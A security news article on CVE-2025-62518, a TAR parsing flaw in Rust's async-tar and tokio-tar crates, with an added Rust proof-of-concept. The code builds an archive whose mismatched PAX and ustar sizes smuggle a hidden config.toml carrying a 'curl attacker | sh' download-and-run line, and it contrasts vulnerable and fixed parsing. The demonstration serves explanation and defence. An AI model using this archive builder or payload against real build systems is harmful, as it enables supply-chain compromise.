
TARmageddon Vulnerability Affects Rust async-tar Library, Enables Remote Code Execution

A critical vulnerability, dubbed TARmageddon, has been discovered in the abandoned Rust library async-tar and its forks (including tokio-tar). It can be leveraged to achieve remote execution of arbitrary code.

The issue has been assigned the identifier CVE-2025-62518. It is a logic flaw caused by a desynchronization in the archive parser, which allows unauthenticated attackers to inject additional entries into an archive while a TAR file is being extracted.

The vulnerability manifests when processing nested TAR archives whose entries carry mismatched size values in the ustar header and the PAX extended header. Because the parser reads the entry using one size but advances to the next header using the other, it lands inside the file contents, mistakes the attacker-supplied bytes there for TAR headers, and extracts the attacker-crafted files they describe.
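To make the failure mode concrete, here is an added example in Rust, written for this page and not code from async-tar, tokio-tar or Edera: a deliberately minimal TAR reader that models the desynchronization. It assumes the mechanism the CVE describes, namely that the reader takes the entry's length from the PAX size record but computes the next header's offset from the ustar size field. The archive it parses is constructed inline, and all names (outer.tar, config.toml, the payload text) are made up for the demonstration.

```rust
// Added example, not tokio-tar's code: a toy TAR reader reproducing CVE-2025-62518.
const BLOCK: usize = 512;

/// Round a byte count up to the next 512-byte block boundary.
fn padded(n: usize) -> usize {
    (n + BLOCK - 1) / BLOCK * BLOCK
}

/// Build a ustar header with a valid checksum (an attacker can always compute one).
fn ustar_header(name: &str, size: usize, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[124..135].copy_from_slice(format!("{:011o}", size).as_bytes()); // size, octal
    h[148..156].copy_from_slice(b"        "); // checksum field counts as spaces
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..154].copy_from_slice(format!("{:06o}", sum).as_bytes());
    h[155] = b' '; // h[154] stays NUL
    h
}

/// Encode one PAX record, "<len> key=value\n", where len counts the whole record.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = format!(" {}={}\n", key, value);
    let mut len = body.len() + 1;
    while len.to_string().len() + body.len() != len {
        len += 1;
    }
    format!("{}{}", len, body).into_bytes()
}

/// Constructed malicious archive: outer.tar has size 0 in its ustar header but its
/// real size in the PAX header, and its data is itself a TAR with a smuggled entry.
fn build_archive() -> Vec<u8> {
    let payload = b"[build]\nscript = \"curl attacker | sh\"\n"; // constructed sample
    let mut inner = Vec::new();
    inner.extend_from_slice(&ustar_header("config.toml", payload.len(), b'0'));
    inner.extend_from_slice(payload);
    inner.resize(padded(inner.len()), 0); // 1024 bytes: header + padded data

    let mut outer = Vec::new();
    let pax = pax_record("size", &inner.len().to_string());
    outer.extend_from_slice(&ustar_header("./PaxHeaders/outer.tar", pax.len(), b'x'));
    outer.extend_from_slice(&pax);
    outer.resize(padded(outer.len()), 0);
    outer.extend_from_slice(&ustar_header("outer.tar", 0, b'0')); // the size mismatch
    outer.extend_from_slice(&inner);
    outer.resize(outer.len() + 2 * BLOCK, 0); // end-of-archive marker
    outer
}

/// Parse a NUL/space-terminated octal field.
fn octal(field: &[u8]) -> usize {
    let s = std::str::from_utf8(field).unwrap_or("");
    usize::from_str_radix(s.trim_matches(|c: char| c == '\0' || c == ' '), 8).unwrap_or(0)
}

/// Extract the `size` override from a PAX extended-header body, if present.
fn pax_size(body: &[u8]) -> Option<usize> {
    let text = std::str::from_utf8(body).ok()?;
    text.lines()
        .filter_map(|l| l.splitn(2, ' ').nth(1).and_then(|r| r.strip_prefix("size=")))
        .find_map(|v| v.trim().parse::<usize>().ok())
}

/// List entries. `false` models the vulnerable reader: entry length from the PAX size,
/// but the seek to the next header by the ustar size. `true` is the corrected behaviour.
fn list_entries(archive: &[u8], seek_by_pax_size: bool) -> Result<Vec<(String, usize)>, String> {
    let mut entries = Vec::new();
    let mut pending_pax: Option<usize> = None;
    let mut off = 0;
    while off + BLOCK <= archive.len() {
        let h = &archive[off..off + BLOCK];
        if h.iter().all(|&b| b == 0) { break; } // end-of-archive block
        let name = String::from_utf8_lossy(&h[..100]).trim_matches('\0').to_string();
        let ustar_size = octal(&h[124..136]);
        let data = &archive[off + BLOCK..];
        if h[156] == b'x' {
            pending_pax = pax_size(&data[..ustar_size.min(data.len())]);
            off += BLOCK + padded(ustar_size);
            continue;
        }
        let entry_size = pending_pax.take().unwrap_or(ustar_size);
        entries.push((name, entry_size));
        let skip = if seek_by_pax_size { entry_size } else { ustar_size };
        off += BLOCK + padded(skip); // vulnerable: skip 0 bytes, land inside outer.tar
    }
    Ok(entries)
}

fn main() {
    let archive = build_archive();
    println!("vulnerable reader: {:?}", list_entries(&archive, false));
    println!("fixed reader:      {:?}", list_entries(&archive, true));
}
```

With seek_by_pax_size set to false the listing contains config.toml, an entry that does not exist at the top level of the archive and that an extractor would nonetheless write to disk; with true the reader steps over outer.tar's data correctly and sees only the one real entry. Header checksums do not help here: the smuggled header inside outer.tar is attacker-authored and carries a valid checksum, so the defence has to be consistency between the size used to read an entry and the size used to find the next one.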

Edera, whose researchers discovered the vulnerability, explains that an attacker can exploit it in a supply chain attack to overwrite files, for example replacing configuration files and taking control of build systems.

The main danger of CVE-2025-62518 is that the vulnerability affects not only projects using async-tar itself, but also tokio-tar — a hugely popular fork with more than 7 million downloads on crates.io — which has also been abandoned by its maintainers.

Although the active forks have already received patches, Edera researchers warn that it’s impossible to accurately assess the scope of the issue due to the extremely widespread use of other forks, including tokio-tar.

“Due to the widespread use of tokio-tar in various forms, it is impossible to accurately estimate the blast radius of this bug across the ecosystem in advance,” Edera says. “Although the maintained forks have been successfully patched, this case highlights a serious systemic problem: the extremely popular tokio-tar remains unpatched.”

Projects known to be affected by TARmageddon include Binstalk, Astral's uv Python package manager, the wasmCloud platform, liboxen, and the open-source testcontainers library.

The Edera team reports that contacting the developers of async-tar and tokio-tar proved extremely difficult, since “neither project has a SECURITY.md or a public way to get in touch.” The specialists had to resort to social engineering and involve the community to find the right people. As a result, async-tar and astral-tokio-tar received patches, but the hugely popular tokio-tar did not.

Developers of some dependent projects contacted by Edera specialists also said they plan to remove the vulnerable dependency or switch to a patched fork. However, others did not respond at all, and many projects may be using the vulnerable library without even realizing there’s a problem.

Edera advises everyone to upgrade to a patched fork or to remove the vulnerable tokio-tar dependency immediately, since the crate appears to be abandoned and has no fixed release. Researchers recommend switching, for example, to the actively maintained fork astral-tokio-tar. Its lineage runs back through several hands: astral-tokio-tar is a fork of edera-dev/tokio-tar, which is a fork of vorot93/tokio-tar, which is a fork of dignifiedquire/async-tar, itself based on alexcrichton/tar-rs. Projects unsure whether they pull the crate in transitively can check with cargo tree -i tokio-tar, which lists every dependency path leading to it.

At the same time, Edera’s own fork (krata-tokio-tar) will be archived to avoid creating additional confusion in the ecosystem.
